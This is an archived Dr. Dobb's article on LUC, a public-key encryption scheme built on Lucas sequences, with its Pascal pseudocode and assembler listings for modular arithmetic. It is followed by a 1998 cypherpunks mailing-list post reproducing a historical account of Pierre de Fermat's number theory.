>    Algorithms, second edition. Reading, MA: Addison-Wesley, 1981.
>    
>    Schneier, Bruce. "Untangling Public Key Cryptography." Dr. Dobb's
>    Journal (May, 1992).
>    
>    Williams, H.C. "A p + 1 method of factoring." Mathematics of
>    Computation (vol. 39, 1982).
>    
> How the Lucas Alternative Works
> 
>    
>    
>    As with RSA encryption, use of the Lucas alternative involves two
>    public keys: N and e. The number N is assumed to be the product of two
>    large (odd) prime numbers, p and q. Encryption and decryption of a
>    message is achieved using Lucas sequences, which may be defined as
>    shown in Example 1. Note that P and Q are integers.
>    
>    If a message P is to be sent, it is encoded as the residue P1 modulo N
>    of the eth term of the Lucas sequence V[n](P,1), and then transmitted.
>    The receiver uses a secret key d (based on the prime factorization of
>    N) to decode the received message P1, by taking the residue modulo N
>    of the dth term of the Lucas sequence V[n](P1,1). The secret key d is
>    determined so that V[d](V[e](P,1),1) = P modulo N, ensuring the
>    decryption of the received message P1 as P. The existence of such a
>    key d is based on the following theorem.
>    
> Theorem
> 
>    
>    
>    Suppose N is any odd positive integer, and P is any positive integer,
>    such as P{2}-4 is coprime to N. If r is the Lehmer totient function of
>    N with respect to D = P{2}-4 (see Example 2), then V[mr+1](P,1)=P
>    modulo N for every positive integer m. The condition that P{2}-4 be
>    coprime to N is easily checked, as P{2}-4=(P+2)(P-2). Also, because
>    V[d](V[e](P,1),1)=V[de](P,1), according to Example 4(e), the key d may
>    simply be chosen so that de=1 modulo r.
>    
> The Lehmer Totient Function
> 
>    
>    
>    Suppose P and Q are integers, and a and b are the zeros of X{2}-Px+Q
>    (so that P = a+b while Q = ab). Also, let D be the discriminant of
>    x{2}-Px+Q. That is, D = P{2}-4Q = (a-b){2}.
>    
>    The Lucas sequences U[n] = U[n] (P,Q) and V[n] = V[n] (P,Q) are
>    defined for n = 0,1,2, and so on by the equation in Example3.
>    
>    In particular, U[0] = 0, U[1] = 1, and then U[n+1] = PU[n] - QU[n-1]
>    (for n = 1,2,3,...), while V[0] = 2, V[1] = P, and similarly V[n+1]=
>    PV[n]-QV[n-1] (for n = 1,2,3,...). These sequences satisfy a number of
>    identities, including the following which may be simply obtained from
>    the definitions in Example 4.
>    
>    Next, suppose N is any positive integer, and let r be the Lehmer
>    totient function of N with respect to D = P{2}-4Q, defined the same
>    way as in the statement of the theorem. In the special case where N is
>    an odd prime p, the Lehmer totient function of p with respect to D is
>    the number given by the equation in Example 5(a). In this case, the
>    Lucas-Lehmer theorem states that if p does not divide Q then the
>    equation in Example 5(b) holds true.
>    
> Example of LUC
> 
>    
>    
>    Let N = pxq = 1949x2089=4071461, and P = 11111, which equals the
>    message to encrypt/decrypt. The public keys will be e and N; the
>    private key will be d. First, calculate r, the Lehmer totient function
>    of P with respect to N. To do this we need to calculate the Legendre
>    of p and q. Let D = p{2}-4; then (D/1949) =-1 and (D/2089)=-1 are the
>    two Legendre values. Hence r is the least common multiple of 1949 + 1
>    and 2089 + 1; see Example 6(a). Choosing e = 1103 for our public key,
>    we use the Extended Euclidean Algorithm to find the secret key d, by
>    solving the modular equation ed = 1 mod r. d turns out to equal 24017.
>    
>    To encrypt the message 11111, we make the calculation shown in Example
>    6(b). To decrypt the encrypted message, we calculate as in Example
>    6(c). --P.S.
>    
> 
> _LUC PUBLIC-KEY ENCRYPTION_
> by Peter Smith
> 
> 
> [LISTING ONE]
> 
> { To calculate Ve(P,1) modulo N }
>  Procedure LUCcalc;
>  {Initialise}
>  BEGIN
>  D := P*P - 4; ut := 1; vt := P; u := ut; v := vt;
>  If not odd(e) then BEGIN u := 0; v := 2; END;
>  e := e div 2;
>  {Start main}
>  While e > 0 do
>    BEGIN
>    ut := ut*vt mod N; vt := vt*vt mod N;
>    If vt < 3 then vt := vt + N;
>    vt := vt - 2;
>    If odd(e) then
>      BEGIN
>      c := (ut*v + u*vt) mod N;
>      v := (vt*v + D*u*ut) mod N;
>      If odd(v) then v := v + N; v := v/2;
>      If odd(c) then c := c + N; u := c/2;
>      END;
>    e := e div 2;
>    END;
>  END;    {LUCcalc}
> 
> { The required result is the value of v.}
> 
> 
> 
> 
> 
> 
> [LISTING TWO]
> Pseudocode for calculating Lucas Functions
> 
> Procedure wiluc  {   V = V(M) Mod N, the Mth Lucas number(P,1) }
> Var
>                     V,Vb,P,Vf,N,M,NP, Vd, Vf : LargeInteger ;
>                     carry, high_bit_set      : boolean ;
>                     bz                        : word ;
>   BEGIN
>   Va := 2 ;   { V[0] }  Vb = P ;   { V[1] }
>   NP := N - P; bz := bits(M) -1 ; { test bits from high bit downwards }
>   For j := 1 to bz do
>       BEGIN
>       Vc := Vb * Vb; Vf = Vc ; If Vf < 2 then Vf := Vf + N
>       Vf := Vf - 2; Vd := Va * Vb
>       {  Vc := V, Vd := V*Vb, Vf := V-2}
>      If high_bit_set Then
>           BEGIN
>           Vb := P * Vc; If Vb < Vd then Vb := Vb + N; Vb := Vb - Vd;
>           If Vb < P then Vb := Vb + N; Vb := Vb - P; Va := Vf
>           END ;
>      Else BEGIN { "even" ie high bit not set }
>           Va := Vd; If Va < P then Va := Va + N; Va := Va - P;
>           Vb := Vf;
>           END ;
>      High_bit_set := next_bit_down(M);
>      {This boolean function determines the setting of the next bit down}
>      Va := Va Mod N; Vb := Vb Mod N
>      END ; { for j to bz }
> END ; {wiluc}
> 
> 
> 
> 
> 
> 
> [LISTING THREE]
> 
> { Pseudocode for splitting decryption/signing over p and q
>   (N = p*q) }
> Procedure hafluc ( var s,p,q,m,e : LargeInteger ; qix : word ) ;
> var                            ep,emq,
>                                temp,pi,qi,
>                                b,n,pa,qa : LargeInteger ;
> 
> { This procedure applies only to decipherment and signing, where the primes
>   making up the modulus N ( = p * q) are known (or can be easily deduced,
>   since both keys are known). Applying it allows us to halve the amount of
>   work. Encipherment is usually done with a small key - standard is 65537. }
>   Begin
>   Qpr (pa,qa,p,q,m,qix ) ; {} {assumes qix already calculated }
>   ep  = e ;              ep  = ep  Mod pa
>   emq = e ;   emq  = emq Mod qa
>   mp  = m ;    mp  = mp Mod p
>   mq  = m ;    mq  = mq Mod q
>   wiluc(q2,mq,emq,q) ;        wiluc(p2,mp,ep,p) ;
>   if p2 < q2 then
>       Begin
>       temp = q         q  = p    p  = temp
>       temp = q2        q2 = p2   p2 = temp
>       End ;
>   temp = p2   temp = temp - q2
>   n = p * q
> { Solve with Extended Euclidean algorithm qi = 1/q Mod p. The algorithm
> for the Extended Euclidean calculation can be found in Knuth. }
>   r = temp * p
>   r = r mod N
>   s = r * qi
>   s = s Mod n
>   s = s + p2
> End ; { hafluc }
> Procedure SignVerify ;
>   Begin
>   h4 = 4
>   p = large prime...
>   q = large prime...
>   n = p * q
>   bz := bits(n) ;
>     {write(cf,'  generate 4 keysets (d,e)  for p1,q1') ;}
> {
>       qix table for T[qix]
>      Convention for qix
>  This calculation is explained below.
>    Lehmer totient      qix   Legendre values for p  and   q
>    i.e. T[qix] = LCM
>    (p - 1),(q - 1)     1                         1        1
>    (p - 1),(q + 1)     2                         1       -1
>    (p + 1),(q - 1)     3                        -1        1
>    (p + 1),(q + 1)     4                        -1       -1
>     e = encryption key,  small prime eg 65537
>     mu = message as large integer less than n
>     Solve e * d[qix] = 1 Mod T[qix] using Extended Euclidean Algorithm
>     where T[qix] is lcm(p1,q1), the Lehmer totient function of N
>     with repect to mu, according to the above table.
>     This gives 4 possible values of d, the decryption/signing key.
>     The particular value used depends on the message mu, as follows:
>     Let D = mu2 - 4. Calculate the Legendre values of D with respect to
>     both p and q. This value is -1 if D is a quadratic non-residue of
>     p (or q), and equal to 1 if D is a quadratic residue of p (or q).
>     N.B. This part is the most difficult part of LUC! Take care.
> 
>     Signing (Deciphering):
>     hafluc (a,pu,qu,mu,d,qix)
> 
>     Verifying (Enciphering):
>     Use Wiluc.
> End.
> 
> 
> 
> 
> 
> 
> [LISTING FOUR]
> 
> Algorithm D in 32-bit Intel assmbler
> Author: Christopher T. Skinner
> Short version of Mod32.Txt with scalings just as comments
>                Modulus routine for Large Integers
>                         u = u Mod v
> Based on:
> D.E.Knuth  The Art of Computer Programming
>            Vol 2 Semi-Numerical Algorithms 2ed 1981
>            Algorithm D page 257
> We use a Pascal Type called "har" ( for "hexadecimal array")
> Type
>             har = Array[0..255] of byte ;
> Var         u,v : har ;
> Note that u[0] is the length of u and that the
> integer begins in u[1]
> It is desirable that u[1] is on a double word boundary.
> 
> ; Turbo Pascal Usage:      ( Turbo Pascal v6.0)
> ; {$L Mod32a}   { contains mod32 far }
> ; {$F+}   { far pointers }
> ; procedure Mod32 ( var u,v : har ) ;
> ; Turbo Assembler code: (TASM v2.01)--requires 32-bit chip ie 386 or 486
> ; nb FS and GS can be used as temporary storage. Don't try to use them as
> ; segment registers because Windows 3.0 restricts their allowed range, even
> ; after you have finished out of Windows. You will hang for sure, unless you
> ; have used a well-behaved protected-mode program to reset them, or cold boot.
> 
> Data    Segment Word Public Use16
>     vdz     dw ?        ; size  v    words
>     va  dd ?            ;     hi dword v
>     vb  dd ?            ; 2nd     "    v
>     vi  dw ?        ; ^v[1]
>         savdi   dw ?            ; used in addback
> Data    EndS
> 
> Code    Segment Word Public  Use16
>     Assume  cs:Code, ds:Data ,es:Nothing
>         Public  mod32
> ; Pascal Parameters:
> u   Equ DWord Ptr ss:[bp+10]      ; Parameter 1 of 2   (far)
> v       Equ DWord Ptr ss:[bp+ 6]      ; parameter 2 of 2
> uof     equ word ptr  ss:[bp+10]
> vinof   equ word ptr  ss:[bp+ 6]
> 
> mod32   Proc    far
>     push bp
>     mov  bp,sp
>         push di
>         push si
>         push ds          ; save the DS
> 
>         ; Before using Mod32 check that:
>         ;     v > 0
>         ;     v < u         u <= 125 words
>         ;     v[0] is a multiple of 4   and at least 8
>         ;     v[top] >= 80h           (may need to scale u & v)
>         ;     make u[0] = 0 Mod 4     (add 1..3 if required)
> domod:
>         ; now point to our v
>         mov ax,seg v
>         mov ds,ax
>         assume ds:Data
>         mov si, offset v
>         cld
>         assume es:Nothing
>     xor ah,ah
>     mov al,es:[di]   ; ax = size of u in bytes    "uz"
>     mov cx,ax        ; cx = uz
>     mov bx,ax        ; bx = uz
>     mov al,[si]
>     mov dx,ax    ; dx  = size v bytes
>     shr ax,2
>     mov vdz,ax   ; vdz    "     dwords   vz = 0 mod 4
>     sub bx,dx        ; bx = uz - vz  difference in bytes
>     mov ax,bx        ; ax = uz - vz
>     sub ax,3     ; ax = uz - vz - 3     ->  gs
>     sub cx,3     ; cx =  uz - 3
>     add cx,di        ; cx = ^top dword u
>     add ax,di
>     mov gs,ax    ; gs = ^(uz-vz-3)  u start   (by -4  down to 1)
>         inc di
>         mov fs,di    ; fs = uf = ^u[1] , end point
>     inc si
>     mov vi,si    ; vi = ^v[1]
>     add si,dx
>     mov eax,[si-4]
>     mov va,eax   ;  va = high word of v
>     mov eax,[si-8]
>     mov vb,eax       ;  vb = 2nd highest word v
>     mov di,cx    ; set di to ut , as at bottom of loop
> d3:
>     mov edx,es:[di]  ; dx is current high dword of u
>     sub di,4
>         mov eax,es:[di]  ; ax is current 2nd highest dword of u
>     mov ecx,va
>     cmp edx,ecx
>     jae  aa          ; if high word u is 0 , never greater than
>     div ecx      ;          mov ebx,eax
>         mov esi,edx  ; si = rh
>     jmp short ad     ; Normal route -- -- -- -- -->
> aa:     mov eax,0FFFFFFFFh
>     mov edx,es:[di]  ; 2nd highest wrd u
>     jmp short ac
> ab: mov eax,ebx      ; q2
>     dec eax
>     mov edx,esi      ;  rh
> ac: mov ebx,eax      ; q3
>     add edx,ecx
>     jc d4        ; Knuth tests overflow,
>     mov esi,edx
> ; normal route:
>  ad:
>         mul vb       ; Quotient by 2nd digit of divisor
>     cmp edx,esi  ; high word of product : remainder
>     jb  d4           ; no correction to quot, drop thru to mulsub
>         ja  ab           ; nb unsigned use ja/b not jg/l
>     cmp eax,es:[di-4] ; low word of product : 3rd high of u
>     ja  ab
> d4:          ; Multiply & subtract * * * * * * *
>     mov cx,gs
>     mov di,cx    ; low start pos in u for subtraction of q * v
>         sub cx,4
>         mov gs,cx
>         xor ecx,ecx
>     Mov  cx,vdz  ; word count for q * v
>         mov  si,vi   ; si points to v[1]
>         xor ebp,ebp      ; carry 14Oct90 bp had problems in mu-lp
>         even
> ;    ** ** ** ** **  **  **  **
> ba:     lodsd        ; eax <- ds[si]
>     mul ebx      ; dx:ax contains product   carry set if dx > 0
>         add eax,ebp
>         adc edx,0
>     sub es:[di],eax
>         adc edx,0
>         mov ebp,edx
>         add di,4
>     loop ba      ; dec cx , jmp if not 0
> ; .. .. .. . .. .. . .. .. . .. . . ..
>         sub es:[di],edx
>         jnc d7
> 
>     mov si,vi    ;  add back (rare)
>         mov savdi,di
>     mov di,gs
>         add di,4
>     clc
>     mov cx,vdz
> bb:     lodsd        ; eax = ds[si]   si + 2
>     adc es:[di],eax
>         inc di
>         inc di
>         inc di
>         inc di
>         loop bb
>         xor eax,eax
>         mov es:[di],eax
>         mov di,savdi
>         ; test with:
>         ; 1,00000000,00000000,00000001/ 80000000,00000000,00000001
> d7:
>     mov bx,fs     ; fs ^u[1]
>         mov ax,gs     ; gs = current u start position
>     cmp ax,bx     ; current - bottom
>     jb d8
>         sub di,4
>     jmp d3
> d8:
> ; here we would scale u down if it had been scaled up
> quex:                 ; quick exit if v < u
>         cld              ; just in case
>         pop ds
>         pop si
>         pop di
>         pop bp
>     ret 8       ; 2 pointers = 4 words = 8 bytes
> mod32   EndP        ;
> Code    Ends
>     End
> 
> 
> 
> 
> 
> [LISTING FIVE]
> 
> Algorithm D in 16-bit Intel assembler
> Author: Christopher T. Skinner
>    mod16.txt 21 Au8 92     16 bit modulus
> ; divm  Modulus
> Data    Segment Word Public
>     vwz     dw ?        ; size  v    words
>     va  dw ?            ;     hi word v
>     vb  dw ?            ; 2nd    "    v
>     vi  dw ?        ; ^v[1]
>     uf  dw ?        ; ^u[3]
>     uz  dw ?            ; size u byte
>     vz  dw ?             ;   "   v  "
>     ua      dw ?        ; ^( u[0] + uz - vz -1 ) , mul sub start
>     ut  dw ?            ; ^ u[topword]
>     qh      dw ?
>     uzofs   dw ?        ; ttt
>     vzofs   dw ?        ; ttt
> Data    EndS
> Code    Segment Word Public
>     Assume  cs:Code, ds:Data
>         Public  diva
> 
> u   Equ DWord Ptr [bp+10]       ; ES:DI
> v       Equ DWord Ptr [bp+6]        ; DS:SI
>     ; NB v Must be Global, DS based...
> diva    Proc    far
>     push bp
>     mov  bp,sp
>         push ds
>     cld     ; increment lodsw in mulsub
>     lds si,v
>         les di,u
>     xor ah,ah
>     mov al,es:[di]  ; ax = uz size of u in bytes N.B. uz is not actually used
>     mov cx,ax       ; cx = uz
>     mov bx,ax       ; bx = uz
>     mov al,ds:[si]
>     mov dx,ax   ; dx  = size v bytes
>     shr ax,1
>     mov vwz,ax  ; vwz    "     words
>     sub bx,dx       ; bx = uz - vz  difference in bytes
>     mov ax,bx       ; ax = uz - vz
>     dec ax      ; ax = uz - vz - 1     ->  ua
>     dec cx      ; cx =  uz - 1
>     add cx,di       ; cx = ^top word u
>     mov ut,cx   ; ut = ^top word u
>     add ax,di
>     mov ua,ax   ; ua = ^(uz-vz-1)  u start   (by -2  down to 1)
>         inc di
>     mov uf,di   ; uf = ^u[1] , end point
>     inc si
>     mov vi,si   ; vi = ^v[1]
>     add si,dx
>     mov ax,ds:[si-2]
>     mov va,ax   ;  va = high word of v
>     mov ax,ds:[si-4]
>     mov vb,ax       ;  vb = 2nd highest word v
>     mov di,cx   ; set di to ut , as at bottom of loop
> d3:
>     mov dx,es:[di]          ; dx is current high word of u
>     dec di
>     dec di
>     mov ut,di
>         mov ax,es:[di]        ; ax is current 2nd highest word of u
>     mov cx,va
>     cmp dx,cx
>     jae  aa   ;if high word u is 0 , never greater than
>     div cx          ;
>         mov qh,ax
>         mov si,dx       ; si = rh
>     jmp ad          ; Normal route -- -- -- -- -->
> aa:     mov ax,0FFFFh
>     mov dx,es:[di]      ; 2nd highest wrd u
>     jmp ac
> ab: mov ax,qh
>     dec ax
>     mov dx,si       ;  rh
> ac: mov qh,ax
>     add dx,cx
>     jc d4           ; Knuth tests overflow,
>     mov si,dx
> ad:     mul vb          ; Quotient by 2nd digit of divisor
>     cmp dx,si       ; high word of product : remainder
>     jb  d4          ; no correction to quot, drop thru to mulsub
>         ja  ab          ; nb unsigned use ja/b not jg/l
>     cmp ax,es:[di-2]    ; low word of product : 3rd high of u
>     ja  ab
> d4:         ; Multiply & subtract * * * * * * *
>     mov bx,ua
>     mov di,bx   ; low start pos in u for subtraction of q * v
>     dec bx
>     dec bx      ;
>     mov ua,bx
>     Mov  cx,vwz ; word count for q * v
>         mov  si,vi  ; si points to v[1]
>     mov bx,qh
>         xor bp,bp
> ;    ** ** ** ** **  **  **  **
> ba:     lodsw       ; ax <- ds[si]   si + 2  preserve carry over mul ?
>     mul bx      ; dx:ax contains product   carry set if dx > 0
>     add dx,bp
>         xor bp,bp
>     sub es:[di],ax
>     inc di
>     inc di
>     sbb es:[di],dx
>     rcl bp,1
>     loop ba     ; dec cx , jmp if not 0
> ; .. .. .. . .. .. . .. .. . .. . . ..
>         rcr bp,1
>         jnc d7
> 
>     mov si,vi   ;  add back (rare)
>     mov di,ua
>        inc di
>     inc di
>     clc
>     mov cx,vwz
> bb:    lodsw        ; ax = ds[si]   si + 2
>     adc es:[di],ax
>     inc di
>     inc di
>     loop bb
>     mov cx,ut
>     add cx,4
>     sub cx,di
>     shr cx,1        ; word length of u
> bc:    mov Word Ptr es:[di],0
>        inc di
>     inc di
>        loop bc  ;
>     dec di      ;
>     dec di      ;
>     clc
> d7:
>     mov ax,uf
>     cmp ua,ax
>     jb d8
>     dec di      ; New these are suspicious, with an add back and a
>     dec di      ; New
>     jmp d3
> d8:
>              cld   ; just in case
>        pop ds
>     pop bp
>     ret 8       ; 2 pointers = 4 words = 8 bytes ???
> diva    EndP        ;
> Code    Ends
>     End
> 
>    
>      _________________________________________________________________
>    
>    Copyright &copy; 1998, Dr. Dobb's Journal
>    Dr. Dobb's Web Site Home Page -- Top of This Page
>    
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 09:28:45 +0800
To: cypherpunks@ssz.com
Subject: RB_Fermat.html
Message-ID: <199801110153.TAA15325@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



                        PIERRE DE FERMAT (1601 - 1665)
                                       
   
   
   From `A Short Account of the History of Mathematics' (4th edition,
   1908) by W. W. Rouse Ball.
   
   While Descartes was laying the foundations of analytical geometry, the
   same subject was occupying the attention of another and not less
   distinguished Frenchman. This was Fermat. Pierre de Fermat, who was
   born near Montauban in 1601, and died at Castres on January 12, 1665,
   was the son of a leather-merchant; he was educated at home; in 1631 he
   obtained the post of councillor for the local parliament at Toulouse,
   and he discharged the duties of the office with scrupulous accuracy
   and fidelity. There, devoting most of his leisure to mathematics, he
   spent the remainder of his life - a life which, but for a somewhat
   acrimonious dispute with Descartes on the validity of certain analysis
   used by the latter, was unruffled by any event which calls for special
   notice. The dispute was chiefly due to the obscurity of Descartes, but
   the tact and courtesy of Fermat brought it to a friendly conclusion.
   Fermat was a good scholar, and amused himself by conjecturally
   restoring the work of Apollonius on plane loci.
   
   Except a few isolated papers, Fermat published nothing in his
   lifetime, and gave no systematic exposition of his methods. Some of
   the most striking of his results were found after his death on loose
   sheets of paper or written in the margins of works which he had read
   and annotated, and are unaccompanied by any proof. It is thus somewhat
   difficult to estimate the dates and originality of his work. He was
   constitutionally modest and retiring, and does not seem to have
   intended his papers to be published. It is probable that he revised
   his notes as occasion required, and that his published works represent
   the final form of his researches, and therefore cannot be dated much
   earlier than 1660. I shall consider separately (i) his investigations
   in the theory of numbers; (ii) his use in geometry of analysis and of
   infinitesimals; and (iii) his method for treating questions of
   probability.
   
   (i) The theory of numbers appears to have been the favourite study of
   Fermat. He prepared an edition of Diophantus, and the notes and
   comments thereon contain numerous theorems of considerable elegance.
   Most of the proofs of Fermat are lost, and it is possible that some of
   them were not rigorous - an induction by analogy and the intuition of
   genius sufficing to lead him to correct results. The following
   examples will illustrate these investigations.
   
   (a) If p be a prime and a be prime to p then a^(p-1) - 1   is
   divisible by p, that is, a^(p-1) - 1 \equiv 0   (mod p). A proof of
   this, first given by Euler, is well known. A more general theorem is
   that a^(\phi(n)) - 1 \equiv 0 (mod n)   (mod n), where a is prime to n
   and \phi(n)   is the number of integers less than n and prime to it.
   
   (b) An odd prime can be expressed as the difference of two square
   integers in one and only one way. Fermat's proof is as follows. Let n
   be the prime, and suppose it equal to x - y, that is, to (x + y)(x -
   y). Now, by hypothesis, the only integral factors of n are n and
   unity, hence x + y = n and x - y = 1. Solving these equations we get x
   = 1/2 (n + 1) and y = 1/2 (n - 1).
   
   (c) He gave a proof of the statement made by Diophantus that the sum
   of the squares of two integers cannot be of the form 4n - 1; and he
   added a corollary which I take to mean that it is impossible that the
   product of a square and a prime of the form 4n - 1 [even if multiplied
   by a number prime to the latter], can be either a square or the sum of
   two squares. For example, 44 is a multiple of 11 (which is of the form
   4  3 - 1) by 4, hence it cannot be expressed as the sum of two
   squares. He also stated that a number of the form a + b, where a is
   prime to b, cannot be divided by a prime of the form 4n - 1.
   
   (d) Every prime of the form 4n + 1 is expressible, and that in one way
   only, as the sum of two squares. This problem was first solved by
   Euler, who shewed that a number of the form 2^m (4n + 1) can be always
   expressed as the sum of two squares.
   
   (e) If a, b, c, be integers, such that a + b = c, then ab cannot be
   a square. Lagrange gave a solution of this.
   
   (f) The determination of a number x such that xn + 1 may be a square,
   where n is a given integer which is not a square. Lagrange gave a
   solution of this.
   
   (g) There is only one integral solution of the equation x + 2 = y;
   and there are only two integral solutions of the equation x + 4 = y.
   The required solutions are evidently for the first equation x = 5, and
   for the second equation x = 2 and x = 11. This question was issued as
   a challenge to the English mathematicians Wallis and Digby.
   
   (h) No integral values of x, y, z can be found to satisfy the equation
   x^n + y^n = z^n ; if n be an integer greater than 2. This proposition
   has acquired extraordinary celebrity from the fact that no general
   demonstration of it has been given, but there is no reason to doubt
   that it is true.
   
   Probably Fermat discovered its truth first for the case n = 3, and
   then for the case n = 4. His proof for the former of these cases is
   lost, but that for the latter is extant, and a similar proof for the
   case of n = 3 was given by Euler. These proofs depend on shewing that,
   if three integral values of x, y, z can be found which satisfy the
   equation, then it will be possible to find three other and smaller
   integers which also satisfy it: in this way, finally, we shew that the
   equation must be satisfied by three values which obviously do not
   satisfy it. Thus no integral solution is possible. It would seem that
   this method is inapplicable to any cases except those of n = 3 and n =
   4.
   
   Fermat's discovery of the general theorem was made later. A proof can
   be given on the assumption that a number can be resolved into the
   product of powers of primes in one and only one way. The assumption
   has been made by some writers; it is true of real numbers, but it is
   not necessarily true of every complex number. It is possible that
   Fermat made some erroneous supposition, but, on the whole, it seems
   more likely that he discovered a rigorous demonstration.
   
   In 1823 Legendre obtained a proof for the case of n = 5; in 1832
   Lejeune Dirichlet gave one for n = 14, and in 1840 Lam and Lebesgue
   gave proofs for n = 7. The proposition appears to be true universally,
   and in 1849 Kummer, by means of ideal primes, proved it to be so for
   all numbers except those (if any) which satisfy three conditions. It
   is not certain whether any number can be found to satisfy these
   conditions, but there is no number less than 100 which does so. The
   proof is complicated and difficult, and there can be no doubt is based
   on considerations unknown to Fermat. I may add that, to prove the
   truth of the proposition, when n is greater than 4 obviously it is
   sufficient to confine ourselves to cases when n is a prime, and the
   first step in Kummer's demonstration is to shew that one of the
   numbers x, y, z must be divisible by n.
   
   The following extracts, from a letter now in the university library at
   Leyden, will give an idea of Fermat's methods; the letter is undated,
   but it would appear that, at the time Fermat wrote it, he had proved
   the proposition (h) above only for the case when n = 3.
   
     Je ne m'en servis au commencement qe pour demontrer les propositions
     negatives, comme par exemple, qu'il n'y a aucu nombre moindre de
     l'unit qu'un multiple de 3 qui soit compos d'un quarr et du
     triple d'un autre quarr. Qu'il n'y a aucun triangle rectangle de
     nombres dont l'aire soit un nombre quarr. La preuve se fait par
     apagogeen   en cette manire. S'il y auoit aucun triangle rectangle
     en nombres entiers, qui eust son aire esgale  un quarr, il y
     auroit un autre triangle moindre que celuy la qui auroit la mesme
     propriet. S'il y en auoit un second moindre que le premier qui eust
     la mesme propriet il y en auroit par un pareil raisonnement un
     troisieme moindre que ce second qui auroit la mesme propriet et
     enfin un quatrieme, un cinquieme etc. a l'infini en descendant. Or
     est il qu'estant donn un nombre il n'y en a point infinis en
     descendant moindres que celuy la, j'entens parler tousjours des
     nombres entiers. D'ou on conclud qu'il est donc impossible qu'il y
     ait aucun triangle rectange dont l'aire soit quarr. Vide foliu post
     sequens....
     
     Je fus longtemps sans pouvour appliquer ma methode aux questions
     affirmatives, parce que le tour et le biais pour y venir est
     beaucoup plus malais que celuy dont je me sers aux negatives. De
     sorte que lors qu'il me falut demonstrer que tout nombre premier qui
     surpasse de l'unit un multiple de 4, est compos de deux quarrez je
     me treuvay en belle peine. Mais enfin une meditation diverses fois
     reitere me donna les lumieres qui me manquoient. Et les questions
     affirmatives passerent par ma methods a l'ayde de quelques nouveaux
     principes qu'il y fallust joindre par necessit. Ce progres de mon
     raisonnement en ces questions affirmatives estoit tel. Si un nombre
     premier pris a discretion qui surpasse de l'unit un multiple de 4
     n'est point compos de deux quarrez il y aura un nombre premier de
     mesme nature moindre que le donn; et ensuite un troisieme encore
     moindre, etc. en descendant a l'infini jusques a ce que vous
     arriviez au nombre 5, qui est le moindre de tous ceux de cette
     nature, lequel il s'en suivroit n'estre pas compos de deux quarrez,
     ce qu'il est pourtant d'ou on doit inferer par la deduction a
     l'impossible que tous ceux de cette nature sont par consequent
     composez de 2 quarrez.
     
     Il y a infinies questions de cette espece. Mais il y en a quelques
     autres que demandent de nouveaux principes pour y appliquer la
     descente, et la recherche en est quelques fois si mal aise, qu'on
     n'y peut venir qu'avec une peine extreme. Telle est la question
     suivante que Bachet sur Diophante avoe n'avoir jamais peu
     demonstrer, sur le suject de laquelle Mr. Descartes fait dans une de
     ses lettres la mesme declaration, jusques la qu'il confesse qu'il la
     juge si difficile, qu'il ne voit point de voye pour la resoudre.
     Tout nombre est quarr, ou compos de deux, de trois, ou de quatre
     quarrez. Je l'ay enfin range sous ma methode et je demonstre que si
     un nombre donn n'estoit point de cette nature il y en auroit un
     moindre que ne le seroit par non plus, puis un troisieme moindre que
     le second etc. a l'infini, d'ou l'on infere que tous les nombres
     sont de cette nature....
     
     J'ay ensuit consider questions que bien que negatives ne restent
     pas de recevoir tres-grande difficult, la methods pour y pratiquer
     la descente estant tout a fait diverse des precedentes comme il sera
     ais d'espouver. Telles sont les suivantes. Il n'y a aucun cube
     divisible en deux cubes. Il n'y a qu'un seul quarr en entiers que
     augment du binaire fasse un cube, ledit quarr est 25. Il n'y a que
     deux quarrez en entiers lesquels augments de 4 fassent cube,
     lesdits quarrez sont 4 et 121....
     
     Apres avoir couru toutes ces questions la plupart de diverses (sic)
     nature et de differente faon de demonstrer, j'ay pass a
     l'invention des regles generales pour resoudre les equations simples
     et doubles de Diophante. On propose par exemple 2 quarr. + 7957
     esgaux a un quarr (hoc est 2xx + 7967 \propto   quadr.) J'ay une
     regle generale pour resoudre cette equation si elle est possible, on
     decouvrir son impossibilit. Et ainsi en tous les cas et en tous
     nombres tant des quarrez que des unitez. On propose cette equation
     double 2x + 3 et 3x + 5 esgaux chaucon a un quarr. Bachet se
     glorifie en ses commentaires sur Diophante d'avoir trouv une regle
     en deux cas particuliers. Je me donne generale en toute sorte de
     cas. Et determine par regle si elle est possible ou non....
     
     Voila sommairement le conte de mes recherches sur le sujet des
     nombres. Je ne l'ay escrit que parce que j'apprehende que le loisir
     d'estendre et de mettre au long toutes ces demonstrations et ces
     methodes me manquera. En tout cas cette indication seruira aux
     sauants pour trouver d'eux mesmes ce que je n'estens point,
     principlement si Mr. de Carcaui et Frenicle leur font part de
     quelques demonstrations par la descente que je leur ay envoyees sur
     le suject de quelques propositions negatives. Et peut estre la
     posterit me scaure gr de luy avoir fait connoistre que les anciens
     n'ont pas tout sceu, et cette relation pourra passer dans l'esprit
     de ceux qui viendront apres moy pour traditio lampadis ad filios,
     comme parle le grand Chancelier d'Angleterre, suivant le sentiment
     et la devise duquel j'adjousteray, multi pertransibunt et augebitur
     scientia.
     
   
   
   (ii) I next proceed to mention Fermat's use in geometry of analysis
   and of infinitesimals. It would seem from his correspondence that he
   had thought out the principles of analytical geometry for himself
   before reading Descartes's Gomtrie, and had realised that from the
   equation, or, as he calls it, the ``specific property,'' of a curve
   all its properties could be deduced. His extant papers on geometry
   deal, however, mainly with the application of infinitesimals to the
   determination of the tangents to curves, to the quadrature of curves,
   and to questions of maxima and minima; probably these papers are a
   revision of his original manuscripts (which he destroyed), and were
   written about 1663, but there is no doubt that he was in possession of
   the general idea of his method for finding maxima and minima as early
   as 1628 or 1629.
   
   He obtained the subtangent to the ellipse, cycloid, cissoid, conchoid,
   and quadratrix by making the ordinates of the curve and a straight
   line the same for two points whose abscissae were x and x - e; but
   there is nothing to indicate that he was aware that the process was
   general, it is probable that he never separated it, so to speak, from
   the symbols of the particular problem he was considering. The first
   definite statement of the method was due to Barrow, and was published
   in 1669.
   
   Fermat also obtained the areas of parabolas and hyperbolas of any
   order, and determined the centres of mass of a few simple laminae and
   of a paraboloid of revolution. As an example of his method of solving
   these questions I will quote his solution of the problem to find the
   area between the parabola y = p x, the axis of x, and the line x =
   a. He says that, if the several ordinates of the points for which x
   is equal to a, a(1 - e), a(1 - e),... be drawn, then the area will be
   split into a number of little rectangles whose areas are respectively
   
     ae(pa^2)^(1/3), ae(1-e) ( pa^2(1-e)^2 )^(1/3),... .
     
